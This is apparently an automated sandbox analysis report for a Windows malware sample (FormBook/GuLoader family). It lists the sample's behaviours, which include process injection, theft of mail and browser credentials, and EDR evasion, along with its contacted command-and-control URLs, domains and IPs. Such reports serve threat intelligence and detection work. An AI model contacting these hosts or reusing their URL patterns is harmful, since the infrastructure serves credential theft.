        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Archive Collected Data        		3
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Abuse Elevation Control Mechanism        		1
        Access Token Manipulation        		Security Account Manager2
        Process Discovery        		SMB/Windows Admin Shares1
        Data from Local System        		4
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        DLL Side-Loading        		312
        Process Injection        		NTDS1
        Application Window Discovery        		Distributed Component Object Model1
        Clipboard Data        		5
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information        		LSA Secrets3
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Abuse Elevation Control Mechanism        		Cached Domain Credentials4
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
        Obfuscated Files or Information        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1445848 Sample: FRA.0038253.exe Startdate: 22/05/2024 Architecture: WINDOWS Score: 100 31 www.vicenc39-ns.store 2->31 33 www.vcayy.top 2->33 35 25 other IPs or domains 2->35 49 Snort IDS alert for network traffic 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Antivirus detection for URL or domain 2->53 55 4 other signatures 2->55 10 FRA.0038253.exe 3 40 2->10         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\System.dll, PE32 10->29 dropped 13 FRA.0038253.exe 6 10->13         started        process6 dnsIp7 43 drive.google.com 142.250.69.206, 443, 49793 GOOGLEUS United States 13->43 45 drive.usercontent.google.com 142.251.33.97, 443, 49794 GOOGLEUS United States 13->45 67 Maps a DLL or memory area into another process 13->67 17 aqqPMpTRvveOzLCNSEwwpwdiQeo.exe 13->17 injected signatures8 process9 signatures10 47 Found direct / indirect Syscall (likely to bypass EDR) 17->47 20 runas.exe 13 17->20         started        process11 signatures12 57 Tries to steal Mail credentials (via file / registry access) 20->57 59 Tries to harvest and steal browser information (history, passwords, etc) 20->59 61 Modifies the context of a thread in another process (thread injection) 20->61 63 2 other signatures 20->63 23 aqqPMpTRvveOzLCNSEwwpwdiQeo.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.shortfox.top 203.161.49.193, 49813, 49814, 49815 VNPT-AS-VNVNPTCorpVN Malaysia 23->37 39 www.beersekes.com 14.225.238.195, 49825, 49826, 49827 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 23->39 41 8 other IPs or domains 23->41 65 Found direct / indirect Syscall (likely to bypass EDR) 23->65 signatures15

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        FRA.0038253.exe5%ReversingLabs
        FRA.0038253.exe100%AviraHEUR/AGEN.1336996

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://www.century21morenoycia.mx/op6t/?nvddg=1X53ctdebY/A2eDtJqzL446hhD1I+nvyO5ulDREEvqgJJ1wskdyJ8sishyyYv1KZ95Yv7APwNDtcqTXRSGEguqmEKyboxWEzcfGHGWjx7gGV1XFCOYCNEPY=&x2=wN2xY0%Avira URL Cloudsafe
        http://www.shortfox.top/op6t/?nvddg=0Ny09Eq8ZBefbKkvkqaUMIZRDRlNq5VNIHijnsMzF4DJMnHDgghZ+20Zz3OB9IxSUXOfCxAz72VlILBCQfa8jvMelkWZW+WeIhBsswld1octwAWuto44rRQ=&x2=wN2xY0%Avira URL Cloudsafe
        http://www.l7aeh.us/op6t/?x2=wN2xY&nvddg=joKdiSi7KJbAbr0hs6/zjIJE4Behm4Eg2djH6+j8Qf7psFFLI9x7hyvntQ/EnvkMSFoG+HsqaOuOcF82SsMnr5xrxJqptXsvFzFrqoI6sGt4i0+JY4UwfJo=0%Avira URL Cloudsafe
        http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
        http://www.century21morenoycia.mx/op6t/0%Avira URL Cloudsafe
        http://www.beersekes.com/op6t/?x2=wN2xY&nvddg=YctXgwSc3BFH36yF9ys3dkgcNMzODdMAg5UrK4hoOCtkU8eu6jJtgKS+79VookX26kbq7jB7bx1t6icTSvNHhm9auK9O3RFTYlK19WO6PR6V1RPvKp1uln4=0%Avira URL Cloudsafe
        http://www.curty.se/op6t/?x2=wN2xY&nvddg=2K+bizHsAgvfK4Jo/uhNk3UulAHtk/DKCDOKU6rtdoeHnbYDCZc/1AXytKkQw+QkOVrLH0jtXL2IhsFkUUnXJZ7gVE9SlKcPHqW4H/CrkavSbMd4d5+KoUM=0%Avira URL Cloudsafe
        https://drive.usercontent.google.com/0%Avira URL Cloudsafe
        http://www.tycent520test.com/op6t/?nvddg=+6aS9fJbP9c9g0cefBC2hCdSY6eI42Bs0771KfpwNwRwjCkC9gP/ScKef//fPL1ZRbSBI6tgf+IRGYWXfXrYWSfcXSoVwh43zp6ZVipPdxItsiOM6ZnovEU=&x2=wN2xY100%Avira URL Cloudmalware
        http://www.shortfox.top/op6t/0%Avira URL Cloudsafe
        http://www.getgoodscrub.com/op6t/0%Avira URL Cloudsafe
        http://www.curty.se/op6t/0%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
        http://nsis.sf.net/NSIS_Error0%Avira URL Cloudsafe
        http://www.cngdesk.com/op6t/?x2=wN2xY&nvddg=B1nuqD59UoVahAAaaPrLlCdA9edg7gWIZ1BY+KXGwtiEVaDOMCSD80sEnTK1l1I1d32+6CzQNcHoayq10cGYYZnPmWF+i7E8hCdylepAFYAEUUK5dUTY9b4=0%Avira URL Cloudsafe
        https://drive.google.com/0%Avira URL Cloudsafe
        https://www.google.com0%Avira URL Cloudsafe
        http://www.ng-bo.online/op6t/?x2=wN2xY&nvddg=QBE+WD5B6Jkt78kVGAOSUjwaMNkkuAvPxxlILtocCDSSbk2FnDvYucSHDfntlLOKDiDLv1Q+MrvgQctCdQiXEWmDWyfYVOljC1RMawJvJ4/x6B/DgtrXZJ0=0%Avira URL Cloudsafe
        http://www.facesofhoustontx.com/op6t/0%Avira URL Cloudsafe
        http://www.ng-bo.online/op6t/0%Avira URL Cloudsafe
        http://www.getgoodscrub.com/op6t/?nvddg=aEKUNFeJbfSYXwp4ZCE5pj6NM5Y9npuXTcZZ2VZLyy8DmHHct0wY69Uf2FlN/+Mr5yqkWwSEcnLthRGoVw08meHK6rNA3rJY5N4rrVRcMXWX5QnofEk8vUc=&iXoT=lfKx4XoXw4a8lZu0%Avira URL Cloudsafe
        http://www.cngdesk.com/op6t/0%Avira URL Cloudsafe
        https://apis.google.com0%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
        http://www.beersekes.com/op6t/0%Avira URL Cloudsafe
        http://www.tycent520test.com/op6t/100%Avira URL Cloudmalware
        https://drive.usercontent.google.com/20%Avira URL Cloudsafe
        http://www.facesofhoustontx.com/op6t/?x2=wN2xY&nvddg=BHIAQNMULh6XRL1bx9H5u1ZiIAZR91nuzdCSdKuFpLeK/J0eLacPvObCKir816qtvGKK6uKZvELi45NaX+Eep6GNrYofejB/V2VvbUmxnRNQoZSvM+S992o=0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        tycent520test.com
        		139.162.5.234
        		truetrue
          		unknown
          www.cngdesk.com
          		47.243.134.243
          		truetrue
            		unknown
            www.facesofhoustontx.com
            		34.174.122.2
            		truetrue
              		unknown
              www.shortfox.top
              		203.161.49.193
              		truetrue
                		unknown
                www.l7aeh.us
                		91.195.240.123
                		truetrue
                  		unknown
                  www.ng-bo.online
                  		37.140.192.90
                  		truetrue
                    		unknown
                    drive.usercontent.google.com
                    		142.251.33.97
                    		truefalse
                      		unknown
                      td-ccm-neg-87-45.wixdns.net
                      		34.149.87.45
                      		truetrue
                        		unknown
                        curty.se
                        		185.76.64.170
                        		truetrue
                          		unknown
                          www.beersekes.com
                          		14.225.238.195
                          		truetrue
                            		unknown
                            www.getgoodscrub.com
                            		35.213.232.35
                            		truetrue
                              		unknown
                              mustang777slot.net
                              		31.172.87.131
                              		truefalse
                                		unknown
                                drive.google.com
                                		142.250.69.206
                                		truefalse
                                  		unknown
                                  miagronorte.com.ar
                                  		200.58.112.243
                                  		truefalse
                                    		unknown
                                    www.theertyuiergthjk.homes
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.86597.vip
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.andywork.one
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.mustang777slot.net
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.miagronorte.com.ar
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.curty.se
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.babyunitz.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.baronbubbol.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.vcayy.top
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.century21morenoycia.mx
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.vicenc39-ns.store
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.tycent520test.com
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown

                                                            Contacted URLs

                                                            NameMaliciousAntivirus DetectionReputation
                                                            http://www.curty.se/op6t/?x2=wN2xY&nvddg=2K+bizHsAgvfK4Jo/uhNk3UulAHtk/DKCDOKU6rtdoeHnbYDCZc/1AXytKkQw+QkOVrLH0jtXL2IhsFkUUnXJZ7gVE9SlKcPHqW4H/CrkavSbMd4d5+KoUM=true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.beersekes.com/op6t/?x2=wN2xY&nvddg=YctXgwSc3BFH36yF9ys3dkgcNMzODdMAg5UrK4hoOCtkU8eu6jJtgKS+79VookX26kbq7jB7bx1t6icTSvNHhm9auK9O3RFTYlK19WO6PR6V1RPvKp1uln4=true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.l7aeh.us/op6t/?x2=wN2xY&nvddg=joKdiSi7KJbAbr0hs6/zjIJE4Behm4Eg2djH6+j8Qf7psFFLI9x7hyvntQ/EnvkMSFoG+HsqaOuOcF82SsMnr5xrxJqptXsvFzFrqoI6sGt4i0+JY4UwfJo=true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.century21morenoycia.mx/op6t/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.shortfox.top/op6t/?nvddg=0Ny09Eq8ZBefbKkvkqaUMIZRDRlNq5VNIHijnsMzF4DJMnHDgghZ+20Zz3OB9IxSUXOfCxAz72VlILBCQfa8jvMelkWZW+WeIhBsswld1octwAWuto44rRQ=&x2=wN2xYtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.century21morenoycia.mx/op6t/?nvddg=1X53ctdebY/A2eDtJqzL446hhD1I+nvyO5ulDREEvqgJJ1wskdyJ8sishyyYv1KZ95Yv7APwNDtcqTXRSGEguqmEKyboxWEzcfGHGWjx7gGV1XFCOYCNEPY=&x2=wN2xYtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.shortfox.top/op6t/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tycent520test.com/op6t/?nvddg=+6aS9fJbP9c9g0cefBC2hCdSY6eI42Bs0771KfpwNwRwjCkC9gP/ScKef//fPL1ZRbSBI6tgf+IRGYWXfXrYWSfcXSoVwh43zp6ZVipPdxItsiOM6ZnovEU=&x2=wN2xYtrue
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://www.getgoodscrub.com/op6t/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.curty.se/op6t/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.cngdesk.com/op6t/?x2=wN2xY&nvddg=B1nuqD59UoVahAAaaPrLlCdA9edg7gWIZ1BY+KXGwtiEVaDOMCSD80sEnTK1l1I1d32+6CzQNcHoayq10cGYYZnPmWF+i7E8hCdylepAFYAEUUK5dUTY9b4=true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.facesofhoustontx.com/op6t/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.ng-bo.online/op6t/?x2=wN2xY&nvddg=QBE+WD5B6Jkt78kVGAOSUjwaMNkkuAvPxxlILtocCDSSbk2FnDvYucSHDfntlLOKDiDLv1Q+MrvgQctCdQiXEWmDWyfYVOljC1RMawJvJ4/x6B/DgtrXZJ0=true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.ng-bo.online/op6t/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.getgoodscrub.com/op6t/?nvddg=aEKUNFeJbfSYXwp4ZCE5pj6NM5Y9npuXTcZZ2VZLyy8DmHHct0wY69Uf2FlN/+Mr5yqkWwSEcnLthRGoVw08meHK6rNA3rJY5N4rrVRcMXWX5QnofEk8vUc=&iXoT=lfKx4XoXw4a8lZutrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.beersekes.com/op6t/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.cngdesk.com/op6t/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.tycent520test.com/op6t/true
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://www.facesofhoustontx.com/op6t/?x2=wN2xY&nvddg=BHIAQNMULh6XRL1bx9H5u1ZiIAZR91nuzdCSdKuFpLeK/J0eLacPvObCKir816qtvGKK6uKZvELi45NaX+Eep6GNrYofejB/V2VvbUmxnRNQoZSvM+S992o=true
                                                            • Avira URL Cloud: safe
                                                            		unknown

                                                            URLs from Memory and Binaries

                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://drive.usercontent.google.com/FRA.0038253.exe, 00000003.00000003.2675158808.0000000005366000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2868413342.0000000005366000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://nsis.sf.net/NSIS_ErrorErrorFRA.0038253.exe, 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmp, FRA.0038253.exe, 00000000.00000000.2068548890.000000000040A000.00000008.00000001.01000000.00000003.sdmp, FRA.0038253.exe, 00000003.00000000.2484943484.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.google.comFRA.0038253.exe, 00000003.00000003.2647988404.00000000053AC000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000536D000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000535E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdFRA.0038253.exe, 00000003.00000001.2485904531.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://nsis.sf.net/NSIS_ErrorFRA.0038253.exe, FRA.0038253.exe, 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmp, FRA.0038253.exe, 00000000.00000000.2068548890.000000000040A000.00000008.00000001.01000000.00000003.sdmp, FRA.0038253.exe, 00000003.00000000.2484943484.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://drive.google.com/FRA.0038253.exe, 00000003.00000003.2938213391.0000000005315000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdFRA.0038253.exe, 00000003.00000001.2485904531.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://apis.google.comFRA.0038253.exe, 00000003.00000003.2647988404.00000000053AC000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000536D000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000535E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://drive.usercontent.google.com/2FRA.0038253.exe, 00000003.00000003.2675158808.0000000005366000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2868413342.0000000005366000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            142.251.33.97
                                                            		drive.usercontent.google.comUnited States
                                                            		15169GOOGLEUSfalse
                                                            139.162.5.234
                                                            		tycent520test.comNetherlands
                                                            		63949LINODE-APLinodeLLCUStrue
                                                            203.161.49.193
                                                            		www.shortfox.topMalaysia
                                                            		45899VNPT-AS-VNVNPTCorpVNtrue
                                                            47.243.134.243
                                                            		www.cngdesk.comUnited States
                                                            		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                            37.140.192.90
                                                            		www.ng-bo.onlineRussian Federation
                                                            		197695AS-REGRUtrue
                                                            14.225.238.195
                                                            		www.beersekes.comViet Nam
                                                            		135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue
                                                            35.213.232.35
                                                            		www.getgoodscrub.comUnited States
                                                            		19527GOOGLE-2UStrue
                                                            142.250.69.206
                                                            		drive.google.comUnited States
                                                            		15169GOOGLEUSfalse
                                                            34.174.122.2
                                                            		www.facesofhoustontx.comUnited States
                                                            		2686ATGS-MMD-ASUStrue
                                                            34.149.87.45
                                                            		td-ccm-neg-87-45.wixdns.netUnited States
                                                            		2686ATGS-MMD-ASUStrue
                                                            91.195.240.123
                                                            		www.l7aeh.usGermany
                                                            		47846SEDO-ASDEtrue
                                                            185.76.64.170
                                                            		curty.seSweden
                                                            		200719MISSDOMAINSEtrue

                                                            General Information

                                                            Joe Sandbox version:40.0.0 Tourmaline
                                                            Analysis ID:1445848
                                                            Start date and time:2024-05-22 17:27:33 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 17m 58s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                            Run name:Suspected Instruction Hammering
                                                            Number of analysed new started processes analysed:6
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:2
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Sample name:FRA.0038253.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@7/9@27/12
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:
                                                            • Successful, ratio: 92%
                                                            • Number of executed functions: 58
                                                            • Number of non-executed functions: 236
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                                            • Excluded IPs from analysis (whitelisted): 20.106.86.13
                                                            • Excluded domains from analysis (whitelisted): atm-settingsfe-prod-geo2.trafficmanager.net, settings-prod-wus3-1.westus3.cloudapp.azure.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, nexusrules.officeapps.live.com
                                                            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • VT rate limit hit for: FRA.0038253.exe

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            11:31:34API Interceptor28501478x Sleep call for process: runas.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            139.162.5.234fa10576.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.tycent520test.com/op6t/
                                                            F24-005880.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.tycent520test.com/op6t/
                                                            pedido comprado.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.tycent520test.com/op6t/
                                                            orden de carga.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.tycent520test.com/op6t/
                                                            Factura1-FVO-2024000893.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.tycent520test.com/op6t/
                                                            rOrden-de-carga.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.tycent520test.com/op6t/
                                                            factura-20240G000009.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.tycent520test.com/op6t/
                                                            confirmation de cuenta.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.tycent520test.com/op6t/
                                                            FV- 12.429#U00a0TUSOCAL.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.tycent520test.com/op6t/
                                                            FV- 12.429#U00a0TUSOCAL.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.tycent520test.com/op6t/
                                                            203.161.49.193Twrchtrywth.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.innovtech.life/8cwt/
                                                            Telescribe.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.funtechie.top/udud/
                                                            fa10576.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.shortfox.top/op6t/
                                                            RE Draft BL for BK#440019497 REF#388855.exeGet hashmaliciousFormBookBrowse
                                                            • www.funtechie.top/rmga/
                                                            Vibrant Purchase Order 1624.exeGet hashmaliciousFormBookBrowse
                                                            • www.seltgin.top/f8eq/
                                                            F24-005880.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.shortfox.top/op6t/
                                                            ZAM#U00d3WIENIE_NR.2405073.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                            • www.techfun.info/8cgp/
                                                            facturas y albaranes del mes de marzo y abril-pdf.exeGet hashmaliciousFormBookBrowse
                                                            • www.sellstov.top/8cuu/
                                                            SecuriteInfo.com.Win64.PWSX-gen.13670.618.exeGet hashmaliciousFormBookBrowse
                                                            • www.sellstov.top/8cuu/
                                                            4333.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                            • www.shortfox.top/doag/
                                                            47.243.134.243waybillDoc_20052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.cngdesk.com/gzu1/
                                                            fa10576.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.cngdesk.com/op6t/
                                                            Your file name without extension goes here.exeGet hashmaliciousFormBookBrowse
                                                            • www.cngdesk.com/mcz6/
                                                            F24-005880.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.cngdesk.com/op6t/
                                                            WaybillDoc_43948767.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.cngdesk.com/gzu1/
                                                            pedido comprado.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.cngdesk.com/op6t/
                                                            orden de carga.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.cngdesk.com/op6t/
                                                            Factura1-FVO-2024000893.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.cngdesk.com/op6t/
                                                            rOrden-de-carga.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.cngdesk.com/op6t/
                                                            factura-20240G000009.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.cngdesk.com/op6t/

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            www.facesofhoustontx.comfa10576.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 34.174.122.2
                                                            Request for Quotation # 3200025006.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 34.174.122.2
                                                            F24-005880.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 34.174.122.2
                                                            pedido comprado.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 34.174.122.2
                                                            orden de carga.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 34.174.122.2
                                                            Factura1-FVO-2024000893.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 34.174.122.2
                                                            098754345678.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 34.174.122.2
                                                            rQuotationRequestandProductAvailabilityForm.exeGet hashmaliciousFormBookBrowse
                                                            • 34.174.122.2
                                                            rOrden-de-carga.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 34.174.122.2
                                                            factura-20240G000009.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 34.174.122.2
                                                            www.shortfox.topfa10576.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 203.161.49.193
                                                            F24-005880.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 203.161.49.193
                                                            4333.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                            • 203.161.49.193
                                                            pedido comprado.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 203.161.49.193
                                                            orden de carga.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 203.161.49.193
                                                            Factura1-FVO-2024000893.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 203.161.49.193
                                                            rOrden-de-carga.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 203.161.49.193
                                                            factura-20240G000009.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 203.161.49.193
                                                            confirmation de cuenta.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 203.161.49.193
                                                            FV- 12.429#U00a0TUSOCAL.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 203.161.49.193
                                                            www.cngdesk.comwaybillDoc_20052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 47.243.134.243
                                                            fa10576.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 47.243.134.243
                                                            Your file name without extension goes here.exeGet hashmaliciousFormBookBrowse
                                                            • 47.243.134.243
                                                            F24-005880.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 47.243.134.243
                                                            WaybillDoc_43948767.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 47.243.134.243
                                                            pedido comprado.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 47.243.134.243
                                                            orden de carga.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 47.243.134.243
                                                            Factura1-FVO-2024000893.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 47.243.134.243
                                                            rOrden-de-carga.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 47.243.134.243
                                                            factura-20240G000009.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 47.243.134.243

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            LINODE-APLinodeLLCUShttp://ct.ke/STUDENTS-FREE-LAPT0PSGet hashmaliciousUnknownBrowse
                                                            • 172.104.29.90
